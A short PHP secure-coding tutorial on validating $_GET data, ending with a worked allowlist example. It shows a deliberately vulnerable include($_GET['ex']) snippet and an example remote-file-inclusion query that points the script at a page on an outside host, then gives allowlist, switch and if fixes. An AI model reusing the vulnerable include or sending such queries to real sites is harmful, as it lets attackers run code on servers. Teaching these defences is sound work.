php security


PHP GET Security

It is very important to validate the data you take from $_GET before you use it.

$_GET can be used in several ways, and each one calls for different precautions.

For example, suppose you write something like this:

if (isset($_GET['ex']))
   include($_GET['ex']); // vulnerable: includes whatever the request names

With this code, a malicious user can include any page they want in your web page:

?ex=http://www.example.com/bad_page.php

A request like this makes your script include the page of their choice.

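Instead, compare the value with a list of allowed operations:

$operation = array('add', 'delete', 'edit', 'save');

if (isset($_GET['ex']) && in_array($_GET['ex'], $operation, true)) {
    // do something...
}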

You can also use switch or if:

switch ($_GET['ex']) {
    case 'add':
        // something...
        break;
    case 'delete':
        // something...
        break;
    default:
        // something...
}

With if:

if ($_GET['ex'] == "add") {
    // Do something..
}
else if ($_GET['ex'] == "delete") {
    // Do something..
}
else
    die("possible hack attempt");
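The allowlist idea above applied to the include() case from the start of the post, as an added example (not code from the original post). The function name resolve_page, the constant PAGES and the file names under pages/ are hypothetical, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Allowlist: value of ?ex= => script shipped with the application.
// The file names are hypothetical. User input never becomes part of a path.
const PAGES = [
    'add'    => 'pages/add.php',
    'delete' => 'pages/delete.php',
    'edit'   => 'pages/edit.php',
    'save'   => 'pages/save.php',
];

/**
 * Return the script to include for a query-string array, or null when
 * 'ex' is missing, is not a string, or is not on the allowlist.
 */
function resolve_page(array $query): ?string
{
    $ex = $query['ex'] ?? null;

    // ?ex[]=add arrives as an array; accept plain strings only.
    if (!is_string($ex)) {
        return null;
    }

    // Exact, case-sensitive key lookup: a URL or any other value fails.
    return PAGES[$ex] ?? null;
}

// Constructed sample inputs standing in for $_GET.
$samples = [
    ['ex' => 'add'],
    ['ex' => 'Add'],
    ['ex' => 'http://www.example.com/bad_page.php'],
    ['ex' => ['add']],
    [],
];

foreach ($samples as $query) {
    $page = resolve_page($query);
    echo json_encode($query, JSON_UNESCAPED_SLASHES), ' => ',
         $page ?? 'rejected', PHP_EOL;
}

// In a front controller (hypothetical layout):
//   $page = resolve_page($_GET);
//   if ($page === null) { http_response_code(400); exit; }
//   include __DIR__ . '/' . $page;
```

Only the first sample resolves to a file; the other four are rejected because the included path always comes from the fixed table, never from the request.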
